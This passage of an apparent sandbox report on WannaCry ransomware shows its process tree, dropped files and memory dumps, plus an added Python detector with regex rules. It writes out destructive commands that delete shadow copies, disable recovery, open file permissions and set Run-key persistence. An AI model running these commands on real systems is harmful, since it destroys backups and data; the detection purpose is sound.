          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
    [3] C:\ProgramData\mpvxsxzo192\taskdl.exe
        cmdline: taskdl.exe
        - Executes dropped EXE
    [3] C:\ProgramData\mpvxsxzo192\taskse.exe
        cmdline: taskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
          cmdline: "C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
    [3] C:\ProgramData\mpvxsxzo192\taskdl.exe
        cmdline: taskdl.exe
        - Executes dropped EXE
    [3] C:\ProgramData\mpvxsxzo192\taskse.exe
        cmdline: taskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
          cmdline: "C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
    [3] C:\ProgramData\mpvxsxzo192\taskdl.exe
        cmdline: taskdl.exe
        - Executes dropped EXE

[1] C:\Windows\system32\vssvc.exe
    cmdline: C:\Windows\system32\vssvc.exe
    - Modifies service
    - Suspicious use of AdjustPrivilegeToken

[1] C:\WINDOWS\mssecsvc.exe
    cmdline: C:\WINDOWS\mssecsvc.exe
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
  [2] C:\WINDOWS\tasksche.exe
      cmdline: C:\WINDOWS\tasksche.exe /i
      - Executes dropped EXE

[1] C:\Windows\system32\cmd.exe
    cmdline: cmd.exe /c "C:\ProgramData\mpvxsxzo192\tasksche.exe"
  [2] C:\ProgramData\mpvxsxzo192\tasksche.exe
      cmdline: C:\ProgramData\mpvxsxzo192\tasksche.exe
      - Executes dropped EXE
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +h .
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\icacls.exe
        cmdline: icacls . /grant Everyone:F /T /C /Q
        - Modifies file permissions
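The process tree shows the command lines a detection engineer would key on: the shadow-copy and recovery-disabling chain under @WanaDecryptor@.exe vs, the icacls . /grant Everyone:F call, attrib +h on the staging directory and the reg add to the Run key, plus the .WNCRYT to .WNCRY rename listed under "Modifies extensions of user files". The block below is an added example, not part of the sandbox report, that runs those checks over constructed process-creation and file-rename events modelled on this trace. The event dicts, rule names and the three-family threshold are assumptions made for the example; the ATT&CK IDs use current sub-technique numbering rather than the v6 matrix the report links to.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed process-creation events modelled on the command lines in the process
# tree above (pid, ppid, image, cmdline). Not real telemetry; pid 1928 is reused on purpose.
SAMPLE_EVENTS = [
    {"pid": 1604, "ppid": 1740, "image": r"C:\ProgramData\mpvxsxzo192\tasksche.exe",
     "cmdline": r"C:\ProgramData\mpvxsxzo192\tasksche.exe"},
    {"pid": 1668, "ppid": 1604, "image": r"C:\Windows\SysWOW64\attrib.exe",
     "cmdline": "attrib +h ."},
    {"pid": 1928, "ppid": 1604, "image": r"C:\Windows\SysWOW64\icacls.exe",
     "cmdline": "icacls . /grant Everyone:F /T /C /Q"},
    {"pid": 1928, "ppid": 2028, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete "
                "& bcdedit /set {default} bootstatuspolicy ignoreallfailures "
                "& bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"},
    {"pid": 808, "ppid": 1928, "image": r"C:\Windows\SysWOW64\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"pid": 556, "ppid": 1928, "image": r"C:\Windows\SysWOW64\Wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"pid": 1060, "ppid": 948, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mpvxsxzo192" '
                r'/t REG_SZ /d "\"C:\ProgramData\mpvxsxzo192\tasksche.exe\"" /f'},
    # Benign control: an administrator listing shadow copies must not fire.
    {"pid": 3000, "ppid": 2999, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
]

# (rule name, pattern applied to the lower-cased command line, current ATT&CK technique ID)
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"), "T1490"),
    ("recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no"
                r"|wbadmin(\.exe)?\s+delete\s+catalog"), "T1490"),
    ("acl_everyone_full", re.compile(r"icacls(\.exe)?\s+.*?/grant\s+everyone:f\b"), "T1222.001"),
    ("run_key_persistence", re.compile(r"reg(\.exe)?\s+add\s+\S*\\currentversion\\run\b"), "T1547.001"),
    ("hide_working_dir", re.compile(r"attrib(\.exe)?\s+\+h\b"), "T1564.001"),
]


def scan_processes(events: List[Dict]) -> List[Dict]:
    """One finding per (process, rule) hit; a cmd.exe chain can hit several rules."""
    findings = []
    for e in events:
        cmd = e["cmdline"].lower()
        for name, rx, technique in RULES:
            if rx.search(cmd):
                findings.append({"pid": e["pid"], "ppid": e["ppid"],
                                 "image": os.path.basename(e["image"].replace("\\", "/")),
                                 "rule": name, "technique": technique})
    return findings


def verdict(findings: List[Dict], threshold: int = 3) -> Dict:
    """Count distinct rule families. One family on its own (an admin pruning old shadow
    copies, say) is weak evidence; three or more in one trace is not."""
    rules = sorted({f["rule"] for f in findings})
    return {"rules": rules,
            "techniques": sorted({f["technique"] for f in findings}),
            "ransomware_like": len(rules) >= threshold}


# Constructed file-rename events: the first mirrors the IoC under "Modifies extensions of
# user files", the second is a benign Word save-as.
SAMPLE_FILE_EVENTS = [
    {"op": "rename", "image": "tasksche.exe",
     "src": r"C:\Users\Admin\Pictures\SetDeny.raw.WNCRYT",
     "dst": r"C:\Users\Admin\Pictures\SetDeny.raw.WNCRY"},
    {"op": "rename", "image": "WINWORD.EXE",
     "src": r"C:\Users\Admin\Documents\report.docx",
     "dst": r"C:\Users\Admin\Documents\report_final.docx"},
]

# Assumed short list of user-data extensions; a real deployment would use a fuller one.
USER_FILE_EXTS = {".raw", ".jpg", ".png", ".docx", ".xlsx", ".pdf", ".txt"}


def appended_extension_renames(file_events: List[Dict]) -> List[Tuple[str, str]]:
    """Renames whose destination keeps the original user-file extension and appends a new
    one (SetDeny.raw -> SetDeny.raw.WNCRY). Generalises the single IoC on the page to any
    appended extension. Returns (image, appended extension) pairs."""
    hits = []
    for ev in file_events:
        if ev["op"] != "rename":
            continue
        stem, outer = os.path.splitext(ev["dst"].lower())
        inner = os.path.splitext(stem)[1]
        if inner in USER_FILE_EXTS and outer not in USER_FILE_EXTS:
            hits.append((ev["image"], outer))
    return hits


if __name__ == "__main__":
    for f in scan_processes(SAMPLE_EVENTS):
        print(f"pid {f['pid']:>5} {f['image']:<14} {f['rule']:<22} {f['technique']}")
    print(verdict(scan_processes(SAMPLE_EVENTS)))
    print(appended_extension_renames(SAMPLE_FILE_EVENTS))
```

Because the same command line appears twice in this trace (once in the cmd.exe /c chain and once in the child vssadmin.exe and WMIC.exe processes), the per-process findings over-count; the verdict therefore scores distinct rule families rather than raw hits, and the benign vssadmin list shadows control produces nothing.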
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\mpvxsxzo192\00000000.eky
-
C:\ProgramData\mpvxsxzo192\00000000.pky
-
C:\ProgramData\mpvxsxzo192\00000000.res
-
C:\ProgramData\mpvxsxzo192\00000000.res
-
C:\ProgramData\mpvxsxzo192\175431600395137.bat
-
C:\ProgramData\mpvxsxzo192\@Please_Read_Me@.txt
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe.lnk
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\LIBEAY32.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\SSLEAY32.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libevent-2-0-5.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libevent_core-2-0-5.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libevent_extra-2-0-5.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libgcc_s_sjlj-1.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libssp-0.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\tor.exe
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\zlib1.dll
-
C:\ProgramData\mpvxsxzo192\b.wnry
-
C:\ProgramData\mpvxsxzo192\b.wnry
-
C:\ProgramData\mpvxsxzo192\c.wnry
-
C:\ProgramData\mpvxsxzo192\c.wnry
-
C:\ProgramData\mpvxsxzo192\c.wnry
-
C:\ProgramData\mpvxsxzo192\f.wnry
-
C:\ProgramData\mpvxsxzo192\m.vbs
-
C:\ProgramData\mpvxsxzo192\msg\m_bulgarian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_bulgarian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (simplified).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (simplified).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (traditional).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (traditional).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_croatian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_croatian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_czech.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_czech.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_danish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_danish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_dutch.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_dutch.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_english.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_english.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_filipino.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_filipino.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_finnish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_finnish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_french.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_french.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_german.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_german.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_greek.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_greek.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_indonesian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_indonesian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_italian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_italian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_japanese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_japanese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_korean.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_korean.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_latvian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_latvian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_norwegian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_norwegian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_polish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_polish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_portuguese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_portuguese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_romanian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_romanian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_russian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_russian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_slovak.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_slovak.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_spanish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_spanish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_swedish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_swedish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_turkish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_turkish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_vietnamese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_vietnamese.wnry
-
C:\ProgramData\mpvxsxzo192\r.wnry
-
C:\ProgramData\mpvxsxzo192\r.wnry
-
C:\ProgramData\mpvxsxzo192\s.wnry
-
C:\ProgramData\mpvxsxzo192\s.wnry
-
C:\ProgramData\mpvxsxzo192\t.wnry
-
C:\ProgramData\mpvxsxzo192\t.wnry
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\tasksche.exe
-
C:\ProgramData\mpvxsxzo192\tasksche.exe
-
C:\ProgramData\mpvxsxzo192\tasksche.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\u.wnry
-
C:\ProgramData\mpvxsxzo192\u.wnry
-
C:\Users\Admin\Desktop\@WanaDecryptor@.bmp
-
C:\WINDOWS\tasksche.exe
-
C:\WINDOWS\tasksche.exe
-
C:\Windows\TEMP\0.WNCRYT
-
C:\Windows\TEMP\1.WNCRYT
-
C:\Windows\TEMP\10.WNCRYT
-
C:\Windows\TEMP\11.WNCRYT
-
C:\Windows\TEMP\12.WNCRYT
-
C:\Windows\TEMP\13.WNCRYT
-
C:\Windows\TEMP\14.WNCRYT
-
C:\Windows\TEMP\15.WNCRYT
-
C:\Windows\TEMP\16.WNCRYT
-
C:\Windows\TEMP\17.WNCRYT
-
C:\Windows\TEMP\18.WNCRYT
-
C:\Windows\TEMP\2.WNCRYT
-
C:\Windows\TEMP\3.WNCRYT
-
C:\Windows\TEMP\4.WNCRYT
-
C:\Windows\TEMP\5.WNCRYT
-
C:\Windows\TEMP\6.WNCRYT
-
C:\Windows\TEMP\7.WNCRYT
-
C:\Windows\TEMP\8.WNCRYT
-
C:\Windows\TEMP\9.WNCRYT
-
C:\Windows\tasksche.exe
-
C:\Windows\tasksche.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libeay32.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libevent-2-0-5.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libgcc_s_sjlj-1.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libssp-0.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\ssleay32.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
\ProgramData\mpvxsxzo192\TaskData\Tor\zlib1.dll
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
memory/308-50-0x0000000000000000-mapping.dmp
-
memory/316-661-0x0000000000000000-mapping.dmp
-
memory/556-647-0x0000000000000000-mapping.dmp
-
memory/800-655-0x0000000000000000-mapping.dmp
-
memory/808-641-0x0000000000000000-mapping.dmp
-
memory/808-652-0x0000000000000000-mapping.dmp
-
memory/836-48-0x0000000000000000-mapping.dmp
-
memory/860-60-0x0000000000000000-mapping.dmp
-
memory/948-635-0x0000000000000000-mapping.dmp
-
memory/1060-639-0x0000000000000000-mapping.dmp
-
memory/1340-633-0x0000000000000000-mapping.dmp
-
memory/1356-658-0x0000000000000000-mapping.dmp
-
memory/1476-418-0x0000000001DC0000-0x0000000001DD1000-memory.dmp
Filesize
68KB
-
memory/1476-86-0x00000000017B0000-0x00000000017C1000-memory.dmp
Filesize
68KB
-
memory/1476-85-0x0000000001BC0000-0x0000000001BD1000-memory.dmp
Filesize
68KB
-
memory/1476-84-0x00000000017B0000-0x00000000017C1000-memory.dmp
Filesize
68KB
-
memory/1476-70-0x0000000000000000-mapping.dmp
-
memory/1476-251-0x00000000017B0000-0x00000000017C1000-memory.dmp
Filesize
68KB
-
memory/1476-252-0x0000000001BC0000-0x0000000001BD1000-memory.dmp
Filesize
68KB
-
memory/1476-253-0x00000000017B0000-0x00000000017C1000-memory.dmp
Filesize
68KB
-
memory/1476-419-0x00000000021D0000-0x00000000021E1000-memory.dmp
Filesize
68KB
-
memory/1476-420-0x0000000001DC0000-0x0000000001DD1000-memory.dmp
Filesize
68KB
-
memory/1504-643-0x0000000000000000-mapping.dmp
-
memory/1604-9-0x0000000010000000-0x0000000010010000-memory.dmp
Filesize
64KB
-
memory/1604-5-0x0000000000000000-mapping.dmp
-
memory/1668-7-0x0000000000000000-mapping.dmp
-
memory/1696-0-0x000007FEF84F0000-0x000007FEF876A000-memory.dmp
Filesize
2.5MB
-
memory/1836-52-0x0000000000000000-mapping.dmp
-
memory/1836-56-0x00000000012E0000-0x00000000012E4000-memory.dmp
Filesize
16KB
-
memory/1848-663-0x0000000000000000-mapping.dmp
-
memory/1880-1-0x0000000000000000-mapping.dmp
-
memory/1928-640-0x0000000000000000-mapping.dmp
-
memory/1928-8-0x0000000000000000-mapping.dmp
-
memory/1996-649-0x0000000000000000-mapping.dmp
-
memory/2024-637-0x0000000000000000-mapping.dmp
-
memory/2024-62-0x0000000000000000-mapping.dmp
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2028-64-0x0000000000000000-mapping.dmp
-
memory/2276-686-0x0000000000000000-mapping.dmp
-
memory/2304-689-0x0000000000000000-mapping.dmp
-
memory/2324-692-0x0000000000000000-mapping.dmp
-
memory/2408-694-0x0000000000000000-mapping.dmp
-
memory/2444-697-0x0000000000000000-mapping.dmp
-
memory/2460-699-0x0000000000000000-mapping.dmp
-
memory/2480-700-0x0000000000000000-mapping.dmp